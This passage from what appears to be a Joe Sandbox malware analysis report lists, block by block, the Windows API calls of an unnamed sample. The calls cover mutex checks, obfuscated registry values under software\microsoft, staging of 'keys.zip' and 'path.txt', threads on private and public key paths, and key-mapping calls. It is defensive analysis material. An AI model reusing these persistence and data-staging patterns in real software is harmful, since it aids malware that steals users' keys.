                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 61c5c09f$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 4280258085-2790425520
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 013032DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013032E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013032F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01303316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C435,RFK), ref: 01303330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01303336
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 61C5C435$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-2898694334
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000823), ref: 012F01F4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F020C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F020F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F021C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F021F
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,-0132FAE4), ref: 012F023C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 012F0259
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F0260
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000014), ref: 012F0270
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,?), ref: 012F02B5
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,00000000,?), ref: 012F02C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911349929-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000823), ref: 012F0071
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F008C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F008F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F009C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F009F
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 012F00BC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 012F00D9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F00E0
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000014), ref: 012F00F0
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000002), ref: 012F0109
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,00000000,00000002), ref: 012F011C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911349929-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012EF404
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012EF40B
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012EF41B
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 012EF426
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 012EF4EE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF4F5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 012EF501
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF508
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?), ref: 012EF52E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012EF55A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF55D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012EF56A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF56D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1948005343-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012E7B33
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF,?,00000000,00000103), ref: 012E7B4B
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?), ref: 012E7B6C
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104), ref: 012E7B92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 012E7C1D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 012E7C24
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?,?,?,?), ref: 012E7C33
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E7C63
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 4158279268-3673152959
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01304297
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C,?,?), ref: 01304329
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 013043B5
                                                                                                                                                                                                                • Part of subcall function 013059D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 013059EE
                                                                                                                                                                                                                • Part of subcall function 013059D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,012E4C50,?,?,012E4C50,?,00000001), ref: 01305A0B
                                                                                                                                                                                                                • Part of subcall function 013059D0: SetNamedSecurityInfoA.ADVAPI32(?,012E4C50,00000010,00000000,00000000,00000000,00000001), ref: 01305A26
                                                                                                                                                                                                                • Part of subcall function 013059D0: LocalFree.KERNEL32(?,?,?,012E4C50,?,00000001), ref: 01305A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},00000006), ref: 013043D2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013043D9
                                                                                                                                                                                                                • Part of subcall function 012E7310: GetHandleInformation.KERNEL32(00000000,00000000,?,?,0130564E,?,00000000), ref: 012E7324
                                                                                                                                                                                                                • Part of subcall function 012E7310: CloseHandle.KERNEL32(00000000,?,?,0130564E,?,00000000), ref: 012E7335
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$BackslashHandleMutexPath$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Mw$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 2697826820-3414533698
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT(?,013256DC), ref: 012F4902
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F491A
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012F4941
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 012F496F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,software\microsoft,00000000,00000102,00000000,?,00000104), ref: 012F49CE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001,?,software\microsoft,00000000,00000102,00000000,?,00000104), ref: 012F49FE
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000,?,software\microsoft,00000000,00000102,00000000,?,00000104), ref: 012F4A0C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,software\microsoft,00000000,00000102,00000000,?,00000104), ref: 012F4A1A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: #680CloseFlushOpenValuelstrcpynmemsetstrstr
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 1680110384-3673152959
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SymGetModuleBase.DBGHELP(?,?), ref: 012E3969
                                                                                                                                                                                                              • SymGetModuleInfo.DBGHELP(?,00000000,0000023C,?,?), ref: 012E397C
                                                                                                                                                                                                              • SymGetSymFromAddr.DBGHELP(?,?,?,00000018,?,00000000,0000023C,?,?), ref: 012E3993
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00001000,%s!%s + 0x%04x,?,?,?,?,?,?,00000018,?,00000000,0000023C,?,?), ref: 012E39BD
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00001000,%s!0x%08x,?,?,?,?,?,00000018,?,00000000,0000023C,?,?), ref: 012E39E1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                              • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                              • API String ID: 844136142-2194319270
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01302827
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 01302867
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 01302871
                                                                                                                                                                                                              • #680.SHELL32(?,?), ref: 01302879
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130288A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?), ref: 01302891
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 0130289E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorLastPath$#680BackslashCreateCurrentFolderMakeSystem
                                                                                                                                                                                                              • String ID: 61C5C435$keys.zip
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(00000000,00000000,?,?,?,012FA227), ref: 012FA068
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,012FA227), ref: 012FA09F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(012FA227,9e2b3f9ba,00000000,?,00000000,?), ref: 012FA0BC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(012FA227), ref: 012FA0C6
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 012FA0F9
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9e2b3f9ba,00000000,?,00000000,?), ref: 012FA116
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012FA120
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$#680
                                                                                                                                                                                                              • String ID: 9e2b3f9ba$software\microsoft
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E3428
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 012E345F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9e2b3e09a,00000000,?,00000000,?), ref: 012E347C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E3486
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 012E34B9
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,9e2b3e09a,00000000,?,00000000,?), ref: 012E34D6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E34E0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$#680
                                                                                                                                                                                                              • String ID: 9e2b3e09a$software\microsoft
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: /$UT
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 012EFCCA
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?), ref: 012EFD7A
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,0000000D,%x,?), ref: 012EFD96
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 012EFDA5
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 012EFDFC
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,00001100,?), ref: 012EFE1D
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 012EFE9F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_snprintf
                                                                                                                                                                                                              • String ID: 0$%x$Content-Length
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 012F92D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F930C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F9338
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F935F
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,?), ref: 012F9392
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012F93AC
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F93B3
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012F93C3
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 012F93CE
                                                                                                                                                                                                              • WSASetLastError.WS2_32(?), ref: 012F9414
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorHeapLast$AllocProcessReadmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?,?), ref: 012E9C41
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000000,00000000,00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?,?), ref: 012E9C5F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?,?), ref: 012E9D2F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?,?), ref: 012E9D51
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000E2AD,00000000,00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?), ref: 012E9D98
                                                                                                                                                                                                              • SendMessageW.USER32(?,?,00000003,00000000,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?), ref: 012E9DBE
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,?,?,?,?,?,?,012E9F49,00000000,?,?,?,?,012E9400,?), ref: 012E9DCB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 3783495248-1167384825
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5A60
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5A8C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5AB3
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012E5AD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000258,000003E8), ref: 012E5B04
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000258), ref: 012E5B25
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012E5B3E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 2971961948-1167384825
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012E5B68
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5B99
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5BC5
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5BEC
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000258,000003E8), ref: 012E5C1D
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000258), ref: 012E5C3E
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012E5C48
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 2971961948-1167384825
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\private\), ref: 012FC139
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FC0E0,00000000,00000000,00000000), ref: 012FC186
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\public\), ref: 012FC19E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FC0C0,00000000,00000000,00000000), ref: 012FC1E2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FC1FA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FC20B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                              • String ID: \private\$\public\
                                                                                                                                                                                                              • API String ID: 677819612-281496920
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF), ref: 012E69A2
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF), ref: 012E69C0
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 012E69DD
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?,?,00000104), ref: 012E6A4D
